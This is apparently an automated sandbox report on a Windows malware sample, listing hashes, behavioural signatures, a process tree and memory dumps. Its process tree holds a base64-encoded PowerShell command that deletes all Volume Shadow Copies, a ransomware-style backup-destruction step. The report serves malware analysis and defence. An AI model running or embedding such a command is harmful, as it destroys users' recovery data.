Analysis

  • max time kernel
    167s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:54

General

  • Target

    db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

  • Size

    164KB

  • MD5

    9a2888ddc389ecde165446d6e3c27f80

  • SHA1

    bf77c02c5a58b5efb29db4191f7e38853dcc3c90

  • SHA256

    db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b

  • SHA512

    9473b40f0b50d3960395e59ca23b8809cb982185f684989d1641c9193c8d2325d2d0843e66421bfdedac26e850bb3d4a9abae06741f7dfb11cf402abcfbdf3b7

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
    "C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:380
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1536
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1364

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/380-127-0x000001DCF7F50000-0x000001DCF7F72000-memory.dmp
      Filesize

      136KB

    • memory/380-132-0x000001DCFA280000-0x000001DCFA2F6000-memory.dmp
      Filesize

      472KB

    • memory/380-137-0x000001DCF8190000-0x000001DCF8192000-memory.dmp
      Filesize

      8KB

    • memory/380-138-0x000001DCF8193000-0x000001DCF8195000-memory.dmp
      Filesize

      8KB

    • memory/3348-118-0x0000000000950000-0x0000000000951000-memory.dmp
      Filesize

      4KB

    • memory/3348-117-0x0000000000940000-0x000000000094A000-memory.dmp
      Filesize

      40KB

    • memory/3348-119-0x0000000000960000-0x0000000000961000-memory.dmp
      Filesize

      4KB

    • memory/3348-120-0x00000000009F0000-0x00000000009F1000-memory.dmp
      Filesize

      4KB

    • memory/3348-121-0x0000000000D40000-0x0000000000D46000-memory.dmp
      Filesize

      24KB